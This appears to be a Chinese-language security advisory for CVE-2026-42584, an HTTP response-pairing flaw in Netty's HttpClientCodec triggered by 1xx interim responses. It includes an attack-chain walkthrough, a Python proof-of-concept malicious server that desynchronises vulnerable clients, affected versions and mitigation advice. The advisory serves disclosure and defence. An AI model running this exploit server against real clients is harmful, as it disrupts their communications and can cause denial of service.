CVE-2026-42584 Netty HTTP请求混淆漏洞

漏洞信息

漏洞编号

CVE-2026-42584

漏洞类型

HTTP请求混淆

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Netty

漏洞概述

Netty是一个异步事件驱动的网络应用框架，广泛用于开发高性能协议服务器和客户端。在4.2.13.Final和4.1.133.Final版本之前，HttpClientCodec在处理HTTP/1.1流水线请求时存在严重逻辑缺陷。当客户端连续发送GET和HEAD请求，且服务器返回103 Early Hints等中间响应时，由于代码对1xx响应的处理逻辑错误，导致响应队列错误地将HEAD请求与GET请求的200响应进行配对。这会导致HEAD请求处理器错误地跳过GET响应的实体内容读取，使得数据流偏移，进而导致后续响应解析错误，可能引发拒绝服务或数据完整性问题。

技术细节

该漏洞源于Netty的HttpClientCodec类在处理入站响应和出站请求配对时的实现缺陷。在默认实现中，每当收到一个响应（包括1xx中间响应），代码会调用queue.poll()来获取对应的出站请求。具体的攻击场景如下：客户端通过流水线方式先发送GET请求，紧接着发送HEAD请求。服务器首先返回103 (Early Hints) 响应，随后返回包含GET请求实体的200响应，最后返回HEAD请求的200响应。问题在于，当收到103响应时，代码消耗了队列中的一个请求（GET）；当收到第一个200响应时，代码再次消耗队列中的请求（HEAD）。这导致GET请求的实体数据被错误地关联给了HEAD请求。由于HTTP协议规定HEAD响应不应包含消息体，HEAD处理逻辑会跳过读取该响应体。因此，GET请求的实体字节残留在TCP流中未被读取。当下一个响应（针对HEAD的200）到达时，解析器会从错误的偏移量开始读取，导致解析混乱。这种状态不同步可能被攻击者利用来干扰HTTP通信。

攻击链分析

STEP 1

步骤1

攻击者诱导客户端向受影响的Netty服务端发送流水线请求，顺序为先GET后HEAD。

STEP 2

步骤2

服务端首先返回1xx中间响应（如103 Early Hints），导致客户端消耗队列中的GET请求进行配对。

STEP 3

步骤3

服务端紧接着返回带有消息体的200 OK响应（本应属于GET），但客户端消耗了队列中的HEAD请求与该响应配对。

STEP 4

步骤4

HEAD请求的处理逻辑跳过了消息体的读取，导致本应被读取的GET实体数据残留在TCP流中。

STEP 5

步骤5

后续的响应解析从错误的偏移量开始，导致HTTP连接状态混乱，可能引发拒绝服务或响应解析错误。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import time

# Malicious server to trigger CVE-2026-42584
# Exploit condition: Client pipelines GET then HEAD, Server sends 103 -> 200 -> 200

def start_exploit_server():
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind(('0.0.0.0', 8080))
    server_socket.listen(1)
    print("[+] Malicious server listening on port 8080...")

    client_socket, addr = server_socket.accept()
    print(f"[+] Connection from {addr}")

    # Receive the pipelined requests (GET followed by HEAD)
    request_data = client_socket.recv(4096).decode('utf-8')
    print("[+] Received pipelined requests:")
    print(request_data)

    # Step 1: Send 103 Early Hints (1xx response)
    # This causes the vulnerable client to poll the queue for the first time (associating GET)
    print("[+] Sending 103 Early Hints...")
    response_103 = "HTTP/1.1 103 Early Hints\r\nLink: </style.css>; rel=preload; as=style\r\n\r\n"
    client_socket.send(response_103.encode('utf-8'))
    time.sleep(0.5)

    # Step 2: Send 200 OK with a body
    # The client polls the queue again (getting HEAD) and pairs it with this body.
    # The HEAD handler will skip the body, leaving bytes on the stream.
    print("[+] Sending 200 OK with body (intended for GET but paired with HEAD)...")
    response_body = "HTTP/1.1 200 OK\r\nContent-Length: 13\r\n\r\nHello, World!"
    client_socket.send(response_body.encode('utf-8'))
    time.sleep(0.5)

    # Step 3: Send 200 OK for the HEAD request
    # The client is now desynchronized and will parse this incorrectly.
    print("[+] Sending final 200 OK...")
    response_final = "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
    client_socket.send(response_final.encode('utf-8'))

    client_socket.close()
    server_socket.close()
    print("[+] Exploit finished.")

if __name__ == "__main__":
    start_exploit_server()

影响范围

Netty < 4.1.133.Final

Netty < 4.2.13.Final

防御指南

临时缓解措施

如果无法立即升级，建议在应用层面禁用HTTP/1.1请求流水线，或者避免处理可能返回1xx中间响应（如103 Early Hints）的服务器通信。